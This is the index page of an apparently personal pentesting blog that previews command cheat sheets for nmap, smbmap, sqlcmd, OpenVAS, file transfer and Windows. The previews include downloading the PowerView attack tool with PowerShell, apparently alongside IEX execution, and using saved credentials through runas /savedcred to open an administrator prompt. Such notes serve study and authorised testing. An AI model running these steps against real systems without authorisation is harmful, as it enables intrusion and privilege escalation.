Cyber Security Sanctorum

Welcome to CSS

You’ll find this post in your _posts directory. Go ahead and edit it and re-build the site to see your changes. You can rebuild the site in many different ways, but the most common way is to run je...

openvas command & paste

Installation: sudo apt-get install gvm && openvas The following command begins the setup process: $ sudo gvm-setup Check setup with: $ sudo gvm-check-setup Start OpenVas with: $ sudo...

file transfer command & paste

Command Description  Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1 Download a file with PowerShell IEX...

windows command & paste

From Powershell: PS C:\Users\john> cmdkey /list; Check the stored credential (eg. administrator) and run: PS C:\Users\john> runas.exe /savedcred /user:administrator cmd; run command prompt...

sqlcmd command & paste

SQLCMD: sqlcmd -S <server URL> -U <username> -P <password>; 1> select @@version 2> go 1> select db_name(); 2> go 1> select host_name(); 2> go 1> select logi...

smbmap command & paste

Windows Recon: SMBmap host discovery: Using the smbmap tool to enumerate the target machine service allows users to enumerate samba share allows file upload/download/delete permission enum...

nmap command & paste

Recon: nmap host discovery: nmap -Pn -n -T5 -sV -sC -p 135,137,139,445,3389 # map a windows server nmap -Pn # -Pn force nmap to scan ports even if the host seems to be dow...

nmap smb command & paste

Windows recon: nmap host discovery: nmap -Pn # -Pn force nmap to scan ports even if the host seems to be down. nmap -Pn -p443 # -p force nmap to scan ports even if filtere...

nmap mssql command & paste

Run Nmap scripts to enumerate the Windows target machine MSSQL service. nmap -p1433 --script ms-sql-info #get MYSQL info; nmap -p1433 --script ms-sql-ntlm-info --script-args mssql.ins...

nmap iis command & paste

Run Nmap scripts to enumerate the Windows target machine IIS service. nmap -p80 -sV --script http-enum #get IIS info and potentially interesting folders; nmap -p80 -sV --script http-h...